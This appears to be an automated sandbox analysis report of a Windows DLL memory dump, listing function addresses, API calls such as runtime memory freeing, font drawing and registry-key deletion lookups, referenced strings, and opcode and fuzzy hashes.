Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: b4154422d9994ea3449ee46e1636b0f578282ae0db9350cfb75ccbc6daf51756
Instruction ID: 8cabf6a17e491c556fb5e34859347b45f6fc66ed1c5c9536eb925d0611be63ae
Opcode Fuzzy Hash: b4154422d9994ea3449ee46e1636b0f578282ae0db9350cfb75ccbc6daf51756
Instruction Fuzzy Hash: 69B1BE71904206AFEB108FB5C8A4FEEBBB8FF49304F15446EE558A7381D7769849CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E4BA080, Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 287memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000003,00000000,line,000000FF,00000000,00000000,?,00000000,2B098C7C,76E3D5B0,00000000), ref: 6E4BA124
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6E4BA132
MultiByteToWideChar.KERNEL32(00000003,00000000,line,000000FF,00000000,00000000,?,00000000,2B098C7C,76E3D5B0,00000000), ref: 6E4BA14F
VarBstrCmp.OLEAUT32(00000000,00000000,00000400,00000000), ref: 6E4BA170
SysFreeString.OLEAUT32(00000000), ref: 6E4BA17F
SysFreeString.OLEAUT32(00000000), ref: 6E4BA306
SysFreeString.OLEAUT32(00000000), ref: 6E4BA358
_com_issue_error.COMSUPP ref: 6E4BA366
SysFreeString.OLEAUT32(76E3D5B0), ref: 6E4BA36C

Strings

line, xrefs: 6E4BA11B, 6E4BA146
Arial, xrefs: 6E4BA195
8, xrefs: 6E4BA22F

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$ByteCharMultiWide$AllocBstr_com_issue_error
String ID: 8$Arial$line
API String ID: 4202715868-2849647811
Opcode ID: b3df8999f2162305c64d0a450c9dab68cff06a63f4737e4db9f4471520da59b9
Instruction ID: aae3cbdf8e57f464352cb95d15ee0784eb2f65d87898bbde767c9ef71e7e2557
Opcode Fuzzy Hash: b3df8999f2162305c64d0a450c9dab68cff06a63f4737e4db9f4471520da59b9
Instruction Fuzzy Hash: 1CA1B030A00249DFEB10CFF4C858FAEBBB8AF45714F24455EE415AB380DB75AA45DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E2CA4, Relevance: 19.6, APIs: 13, Instructions: 114COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 6E4E2CE8

Part of subcall function 6E4E44BE: _free.LIBCMT ref: 6E4E44DB
Part of subcall function 6E4E44BE: _free.LIBCMT ref: 6E4E44ED
Part of subcall function 6E4E44BE: _free.LIBCMT ref: 6E4E44FF
Part of subcall function 6E4E44BE: _free.LIBCMT ref: 6E4E4511
Part of subcall function 6E4E44BE: _free.LIBCMT ref: 6E4E4523
Part of subcall function 6E4E44BE: _free.LIBCMT ref: 6E4E4535
Part of subcall function 6E4E44BE: _free.LIBCMT ref: 6E4E4547
Part of subcall function 6E4E44BE: _free.LIBCMT ref: 6E4E4559
Part of subcall function 6E4E44BE: _free.LIBCMT ref: 6E4E456B
Part of subcall function 6E4E44BE: _free.LIBCMT ref: 6E4E457D
Part of subcall function 6E4E44BE: _free.LIBCMT ref: 6E4E458F
Part of subcall function 6E4E44BE: _free.LIBCMT ref: 6E4E45A1
Part of subcall function 6E4E44BE: _free.LIBCMT ref: 6E4E45B3

_free.LIBCMT ref: 6E4E2CDD

Part of subcall function 6E4D9B98: HeapFree.KERNEL32(00000000,00000000,?,6E4D731A,000000FF,000000FF), ref: 6E4D9BAE
Part of subcall function 6E4D9B98: GetLastError.KERNEL32(6E4D6995,?,6E4D731A,000000FF,000000FF), ref: 6E4D9BC0

_free.LIBCMT ref: 6E4E2CFF
_free.LIBCMT ref: 6E4E2D14
_free.LIBCMT ref: 6E4E2D1F
_free.LIBCMT ref: 6E4E2D41
_free.LIBCMT ref: 6E4E2D54
_free.LIBCMT ref: 6E4E2D62
_free.LIBCMT ref: 6E4E2D6D
_free.LIBCMT ref: 6E4E2DA5
_free.LIBCMT ref: 6E4E2DAC
_free.LIBCMT ref: 6E4E2DC9
_free.LIBCMT ref: 6E4E2DE1

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: fe3c1ae6ca41099156efb5d02b3d2aa38693f4efad087a33e03875414b40c4ab
Instruction ID: 990b88b575f1123c1c256edc1eb1565cfa0ba5da7fca3e5bb7d0c5d28e49d8af
Opcode Fuzzy Hash: fe3c1ae6ca41099156efb5d02b3d2aa38693f4efad087a33e03875414b40c4ab
Instruction Fuzzy Hash: 94318B32614B06AFEB518AB8D820FDA73E8BF01316F21482FE658D7651DF71A8848764

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E45BC, Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E4E4604
_free.LIBCMT ref: 6E4E4628
_free.LIBCMT ref: 6E4E4635
_free.LIBCMT ref: 6E4E465A
_free.LIBCMT ref: 6E4E4667
_free.LIBCMT ref: 6E4E4670
_free.LIBCMT ref: 6E4E494E
_free.LIBCMT ref: 6E4E4956

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c03a0f00fb35889503c7d04549d4c01cc1e7eb5f5bc7f890840ad4568ba1fd4
Instruction ID: 9cec29b4d15ecd5cfb5dc43c5f2316c1e3b9e9d148c823eac49d7c9f6600ce1c
Opcode Fuzzy Hash: 1c03a0f00fb35889503c7d04549d4c01cc1e7eb5f5bc7f890840ad4568ba1fd4
Instruction Fuzzy Hash: 7FC14176D40604AFDB20CAF8CC92FDE77FCAB09755F14455AFA04FB281E670A9458BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DBE31, Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 338COMMON

Download Yara Rule

APIs

Part of subcall function 6E4DA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E4CED16,6E4FD0A0,0000000C,00000004,00000001,00000004,?,6E4B4865,00000000,00000000), ref: 6E4DA298
Part of subcall function 6E4DA294: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6E4B4865,00000000,00000000), ref: 6E4DA33C
Part of subcall function 6E4DA294: _abort.LIBCMT ref: 6E4DA342

_memcmp.LIBVCRUNTIME ref: 6E4DC0DB
_free.LIBCMT ref: 6E4DC14C
_free.LIBCMT ref: 6E4DC165
_free.LIBCMT ref: 6E4DC197
_free.LIBCMT ref: 6E4DC1A0
_free.LIBCMT ref: 6E4DC1AC
GetStartupInfoW.KERNEL32(?), ref: 6E4DC209
GetFileType.KERNEL32(?,6E4DB318,?,00000004), ref: 6E4DC272

Strings

;\Ln, xrefs: 6E4DC129
C, xrefs: 6E4DBF99

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast$FileInfoStartupType_abort_memcmp
String ID: ;\Ln$C
API String ID: 1665419104-2938799140
Opcode ID: 953c1d94eb9c8c4b43946fb9116ddc39a77c2b1fded3cc92ebfb6b571fa7132e
Instruction ID: b90c6e2b5852618d8a5cbeec13d9fb5ca216e29a8caa5d3909d3a156dad47ea5
Opcode Fuzzy Hash: 953c1d94eb9c8c4b43946fb9116ddc39a77c2b1fded3cc92ebfb6b571fa7132e
Instruction Fuzzy Hash: 29D16A35A0121A9FDB24DFA8C8A4E9DB3B4FF49304F1045AEE949A7354D731AE84CF80

Uniqueness

Uniqueness Score: -1.00%

Function 6E4BF070, Relevance: 16.9, APIs: 11, Instructions: 353stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6E4BEEB0: CharNextW.USER32(?,?,00000000,?,C000008C,00000001,?,2B098C7C,00000000,00000000), ref: 6E4BEEEE
Part of subcall function 6E4BEEB0: CharNextW.USER32(00000000,?,?,00000000), ref: 6E4BEF1B
Part of subcall function 6E4BEEB0: CharNextW.USER32(745EEEF0,?,?,00000000), ref: 6E4BEF34
Part of subcall function 6E4BEEB0: CharNextW.USER32(745EEEF0,?,?,00000000), ref: 6E4BEF3F
Part of subcall function 6E4BEEB0: CharNextW.USER32(00000001,?,?,00000000), ref: 6E4BEFAE

lstrcmpiW.KERNEL32(?,6E4F8A28,?,2B098C7C,C000008C,00000000,?,?,00000000,6E4E9BA6,000000FF,?,6E4C00F7,00000000,00000000,C000008C), ref: 6E4BF0F3
lstrcmpiW.KERNEL32(?,6E4F8A2C,?,6E4C00F7,00000000,00000000,C000008C,C000008C), ref: 6E4BF10A

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$lstrcmpi
String ID:
API String ID: 3586774192-0
Opcode ID: d2ca748a0bea9bb18f3ba99f23bbb6a4f6909e54438039afb3f4859d28f78b4a
Instruction ID: 7c52e7eece55a8021c8c3dc32d55e70f735e45fabc7c9f6671ba1b19330ac896
Opcode Fuzzy Hash: d2ca748a0bea9bb18f3ba99f23bbb6a4f6909e54438039afb3f4859d28f78b4a
Instruction Fuzzy Hash: 4BD1C179901219DADB25CFB8CC48FD9B3B9AF58304F11049AEA0DA7241DB70AE55CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B5570, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

__Getcvt.LIBCPMT ref: 6E4B55AE
__Getcvt.LIBCPMT ref: 6E4B55D3

Strings

true, xrefs: 6E4B5669
false, xrefs: 6E4B5630

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Getcvt
String ID: false$true
API String ID: 1921796781-2658103896
Opcode ID: 558d0f8eaf4f67b4ee84decb997d968844cfa7186d4e8ac74977aa255e7c28db
Instruction ID: cbcb5fe9270d5cca62c221e54e7f7f8981b69968eec3090f274013d6d9a49077
Opcode Fuzzy Hash: 558d0f8eaf4f67b4ee84decb997d968844cfa7186d4e8ac74977aa255e7c28db
Instruction Fuzzy Hash: FF514735A042459FDB10CFB4C840FAABBBAEB85714F14859FD9485B385C77AA901CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C1130, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107timeCOMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 6E4C1148
GetDeviceCaps.GDI32(00000000,0000005A), ref: 6E4C1175
MulDiv.KERNEL32(00000008,00000000), ref: 6E4C117E
CreateFontW.GDI32(00000000), ref: 6E4C1187
ReleaseDC.USER32 ref: 6E4C1194
SetTimer.USER32(?,000003E8,000003E8,00000000), ref: 6E4C11A9

Part of subcall function 6E4C2460: BeginPaint.USER32(?,?), ref: 6E4C24A3
Part of subcall function 6E4C2460: GetParent.USER32(?), ref: 6E4C24AC
Part of subcall function 6E4C2460: GetClientRect.USER32(00000000,?), ref: 6E4C24C2
Part of subcall function 6E4C2460: CreateCompatibleDC.GDI32(?), ref: 6E4C24C8
Part of subcall function 6E4C2460: CreateCompatibleBitmap.GDI32(?,?,?), ref: 6E4C24EA
Part of subcall function 6E4C2460: SelectObject.GDI32(00000000,00000000), ref: 6E4C24F6
Part of subcall function 6E4C2460: SelectObject.GDI32(00000000,?), ref: 6E4C2508
Part of subcall function 6E4C2460: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6E4C2521
Part of subcall function 6E4C2460: SendMessageW.USER32(?,0000000F,?,00000000), ref: 6E4C252F
Part of subcall function 6E4C2460: SetBkMode.GDI32(?,00000001), ref: 6E4C2538
Part of subcall function 6E4C2460: SetTextColor.GDI32(?,00FFFFFF), ref: 6E4C2544
Part of subcall function 6E4C2460: GetClientRect.USER32(?,?), ref: 6E4C2556
Part of subcall function 6E4C2460: ClientToScreen.USER32(?,?), ref: 6E4C2564
Part of subcall function 6E4C2460: ClientToScreen.USER32(?,?), ref: 6E4C2579
Part of subcall function 6E4C2460: ClientToScreen.USER32(?,?), ref: 6E4C259B

DeleteObject.GDI32(?), ref: 6E4C11D0

Strings

Arial, xrefs: 6E4C114E

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Client$CreateObjectScreen$CompatibleMessageRectSelectSend$BeginBitmapCapsColorDeleteDeviceFontModePaintParentReleaseTextTimer
String ID: Arial
API String ID: 1525433823-493054409
Opcode ID: d4d1220e9023cb36dba3e8e84dd78036a19cba27a732b99e12e8886a4f804b42
Instruction ID: 06a87f63f6e307d4089ab90eed852f9a104e136fec197c7a60090827a7b871e9
Opcode Fuzzy Hash: d4d1220e9023cb36dba3e8e84dd78036a19cba27a732b99e12e8886a4f804b42
Instruction Fuzzy Hash: 7031DE71200706ABEB60AFB8DC49FAA7BA8FF45711F004112F505DB291CBB5F865CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DA174, Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E4DA188

Part of subcall function 6E4D9B98: HeapFree.KERNEL32(00000000,00000000,?,6E4D731A,000000FF,000000FF), ref: 6E4D9BAE
Part of subcall function 6E4D9B98: GetLastError.KERNEL32(6E4D6995,?,6E4D731A,000000FF,000000FF), ref: 6E4D9BC0

_free.LIBCMT ref: 6E4DA194
_free.LIBCMT ref: 6E4DA19F
_free.LIBCMT ref: 6E4DA1AA
_free.LIBCMT ref: 6E4DA1B5
_free.LIBCMT ref: 6E4DA1C0
_free.LIBCMT ref: 6E4DA1CB
_free.LIBCMT ref: 6E4DA1D6
_free.LIBCMT ref: 6E4DA1E1
_free.LIBCMT ref: 6E4DA1EF

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bbd9ba51c1963281c5bbd356334cf905515cc323e084f864fdf132160aeb8927
Instruction ID: 4bfca73dff8afc7dc23058696ae2a2f53cd2be5e58ea39fc5993d19b5b94aad0
Opcode Fuzzy Hash: bbd9ba51c1963281c5bbd356334cf905515cc323e084f864fdf132160aeb8927
Instruction Fuzzy Hash: C811CB75510508BFCB01DFA4C860CDD3B69FF06254B5249AAFA089F222DB72DE54DB80

Uniqueness

Uniqueness Score: -1.00%

Function 6E4BE310, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 100libraryloaderregistryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,2B098C7C,?,?,?,6E4E9A60,000000FF), ref: 6E4BE349
GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 6E4BE359
GetModuleHandleW.KERNEL32(Advapi32.dll,2B098C7C,?,?,?,6E4E9A60,000000FF), ref: 6E4BE3B9
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 6E4BE3C9
RegDeleteKeyW.ADVAPI32(?,?), ref: 6E4BE418

Strings

Advapi32.dll, xrefs: 6E4BE344, 6E4BE3B4
RegDeleteKeyExW, xrefs: 6E4BE3C3
RegDeleteKeyTransactedW, xrefs: 6E4BE353

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc$Delete
String ID: Advapi32.dll$RegDeleteKeyExW$RegDeleteKeyTransactedW
API String ID: 2668475584-1053001802
Opcode ID: a2b7d7abb00a9e56f9d9420f55daece742dbc96fd6197b4589c72ee736752133
Instruction ID: 650632132db4380b7c4fff1e97e541658e9197d443b504d0a38df20ef23ca17d
Opcode Fuzzy Hash: a2b7d7abb00a9e56f9d9420f55daece742dbc96fd6197b4589c72ee736752133
Instruction Fuzzy Hash: A4316D36608749EFDB218FA9D840F55BBA8EB85720F00416FF91597750CB36A050CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B9100, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 73COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6E4B9149
VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 6E4B9171
VariantClear.OLEAUT32(?), ref: 6E4B9189

Part of subcall function 6E4B8E70: SysFreeString.OLEAUT32(?), ref: 6E4B8ECE
Part of subcall function 6E4B8E70: SysAllocString.OLEAUT32(?), ref: 6E4B8F39

_com_issue_error.COMSUPP ref: 6E4B91AF

Strings

page, xrefs: 6E4B99EB, 6E4B9A16
name, xrefs: 6E4B9248
value, xrefs: 6E4B93D0
counter, xrefs: 6E4B963B, 6E4B9666

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$String$AllocChangeClearFreeInitType_com_issue_error
String ID: counter$name$page$value
API String ID: 2722580932-1733285648
Opcode ID: e80c20ec119f1e1dc8a195a1b963d49f86e15e36be5562cd1ccb157b62339ef7
Instruction ID: dc49259cf60db9f591f10ea26ac5f84268e300b05404bddc09e18db2f4921e72
Opcode Fuzzy Hash: e80c20ec119f1e1dc8a195a1b963d49f86e15e36be5562cd1ccb157b62339ef7
Instruction Fuzzy Hash: 71117C75A0460AABDB10DFB4C908FDEB7BCEB49710F20456BE915E3340D735A904CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C829B, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58libraryCOMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,6E4C85E0,6E500D10,C000008C,?,?,6E4C30BC,?,2B098C7C,00000000,00000000,6E4E98D0,000000FF), ref: 6E4C82AD
LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,?,?,6E4C85E0,6E500D10,C000008C,?,?,6E4C30BC,?,2B098C7C,00000000,00000000), ref: 6E4C82C2
DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,000000FF), ref: 6E4C833E

Strings

AtlThunk_FreeData, xrefs: 6E4C8318
AtlThunk_DataToCode, xrefs: 6E4C8301
atlthunk.dll, xrefs: 6E4C82BD
AtlThunk_InitData, xrefs: 6E4C82EA
AtlThunk_AllocateData, xrefs: 6E4C82D3

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: DecodePointer$LibraryLoad
String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
API String ID: 1423960858-1745123996
Opcode ID: a7572a0c699b1e1bb2be7008021c0281dcad0b6ac36e1210401a901a7963a9e6
Instruction ID: 796ad68d9a6c3fc7ffacf9a9185aa77a3d4adfa29cffcb485a454743b91ef41b
Opcode Fuzzy Hash: a7572a0c699b1e1bb2be7008021c0281dcad0b6ac36e1210401a901a7963a9e6
Instruction Fuzzy Hash: 130122359006117BCA916EF09C40FCA3F885F86A89F000497FC047B3A6FB23BA0681E7

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E128E, Relevance: 13.8, APIs: 9, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f5e3d1df5a84e7caf10e4a52dc6b09bbc5c616323585d364c88e8410b22f947
Instruction ID: 23349a42872d396b130f8ae9e2240afd99fef6320147dc5c6ed03476df65ad8c
Opcode Fuzzy Hash: 7f5e3d1df5a84e7caf10e4a52dc6b09bbc5c616323585d364c88e8410b22f947
Instruction Fuzzy Hash: C1C1C274E4428AAFDB01CFF9C860FEDBBB4AF0A305F04459AE455A7782C7709949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DF447, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,*Ln,6E4CE12A,?,?,?,6E4DF698,00000001,00000001,F9E85006), ref: 6E4DF4A1
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,6E4DF698,00000001,00000001,F9E85006,?,?,?), ref: 6E4DF527
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F9E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6E4DF621
__freea.LIBCMT ref: 6E4DF62E

Part of subcall function 6E4D9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6E4C8F9C,00000105,000000FF,FFFFFFFF,00000000,?,6E4B1687,?,00000103,000000FF), ref: 6E4D9C04

__freea.LIBCMT ref: 6E4DF637
__freea.LIBCMT ref: 6E4DF65C

Strings

*Ln, xrefs: 6E4DF459

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID: *Ln
API String ID: 1414292761-3273697316
Opcode ID: 422b9f5d20fe90c61ac256a5b2333856724befc2551d4de9283e7c28f75158e1
Instruction ID: 84d152f846baabb5032fba102de892ac7daf42d453d49fc1ce9b8fd61a0ea9b4
Opcode Fuzzy Hash: 422b9f5d20fe90c61ac256a5b2333856724befc2551d4de9283e7c28f75158e1
Instruction Fuzzy Hash: 32511872602206AFEF258EF4CC60EAB77A9EF84754F25462EFD14D6250DB34DC4AC690

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B2120, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 6E4B221D

Part of subcall function 6E4C94A7: RaiseException.KERNEL32(?,?,6E4C6476,000000FF,00000000,00000000,FFFFFFFF,?,?,?,?,6E4C6476,000000FF,6E4FCD2C,?,000000FF), ref: 6E4C9507

__CxxThrowException@8.LIBVCRUNTIME ref: 6E4B2262
___std_exception_copy.LIBVCRUNTIME ref: 6E4B228F

Strings

ios_base::failbit set, xrefs: 6E4B2135
ios_base::badbit set, xrefs: 6E4B2227, 6E4B2252, 6E4B2273
X"Kn, xrefs: 6E4B214D
X"Kn, xrefs: 6E4B213F, 6E4B21D5

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw$ExceptionRaise___std_exception_copy
String ID: X"Kn$X"Kn$ios_base::badbit set$ios_base::failbit set
API String ID: 3941765731-4234255262
Opcode ID: 3d088d3d7b320126d5a5d8366e2fb5723a14575dd79d098695629c0b61f6d30f
Instruction ID: 9c95ed235e98831f0a40e0e4707b2a3b8c13145b05efd0f7871f09ee0cfe58ed
Opcode Fuzzy Hash: 3d088d3d7b320126d5a5d8366e2fb5723a14575dd79d098695629c0b61f6d30f
Instruction Fuzzy Hash: A641A075910209AFC704CFF8D840F9EBBACEB49624F148A1FE514EB640DB71A9458BA5

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C9350, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6E4C937B
___except_validate_context_record.LIBVCRUNTIME ref: 6E4C9383
_ValidateLocalCookies.LIBCMT ref: 6E4C9411
__IsNonwritableInCurrentImage.LIBCMT ref: 6E4C943C
_ValidateLocalCookies.LIBCMT ref: 6E4C9491

Strings

csm, xrefs: 6E4C9426
;\Ln, xrefs: 6E4C9455

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: ;\Ln$csm
API String ID: 1170836740-2294048393
Opcode ID: dd79b9efcfb6bf1ff7fcc1bec4cf58cca064d675e9770f9f060e63fe3f30dada
